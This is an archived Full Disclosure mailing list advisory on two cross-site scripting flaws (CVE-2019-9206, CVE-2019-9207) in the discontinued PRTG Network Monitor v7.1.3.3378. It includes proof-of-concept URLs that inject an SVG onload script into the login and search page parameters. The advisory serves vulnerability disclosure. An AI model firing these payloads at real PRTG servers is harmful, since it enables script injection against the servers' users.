[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] [CVE-2019-9206, CVE-2019-9207] Cross Site Scripting in PRTG Network Monitor v7.1.3.3378
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] [CVE-2019-9206, CVE-2019-9207] Cross Site Scripting in PRTG Network Monitor v7.1.3.3378
- From: Rafael Pedrero <rafael.pedrero@xxxxxxxxx>
- Date: Wed, 27 Feb 2019 07:27:21 +0100
In 2009...
<!--
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.paessler.com/prtg
# Software Link: http://www.paessler.com/prtg
# Version: PRTG Network Monitor v7.1.3.3378
# Tested on: All
# CVE : CVE-2019-9206
# Category: webapps
1. Description
PRTG Network Monitor v7.1.3.3378 allows XSS via the /public/login.htm,
errormsg or loginurl parameter. NOTE: This product is discontinued. Update
to last version.
2. Proof of Concept
http://X.X.X.X/public/login.htm?errormsg=&loginurl=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E
http://X.X.X.X/public/login.htm?errormsg=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E&loginurl=XSS
3. Solution:
The product is discontinued. Update to last version.
-->
<!--
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.paessler.com/prtg
# Software Link: http://www.paessler.com/prtg
# Version: PRTG Network Monitor v7.1.3.3378
# Tested on: All
# CVE : CVE-2019-9207
# Category: webapps
1. Description
PRTG Network Monitor v7.1.3.3378 allows XSS via the /search.htm, searchtext
parameter. NOTE: This product is discontinued. Update to last version.
2. Proof of Concept
http://X.X.X.X/search.htm?searchtext=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E
3. Solution:
The product is discontinued. Update to last version.
-->
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/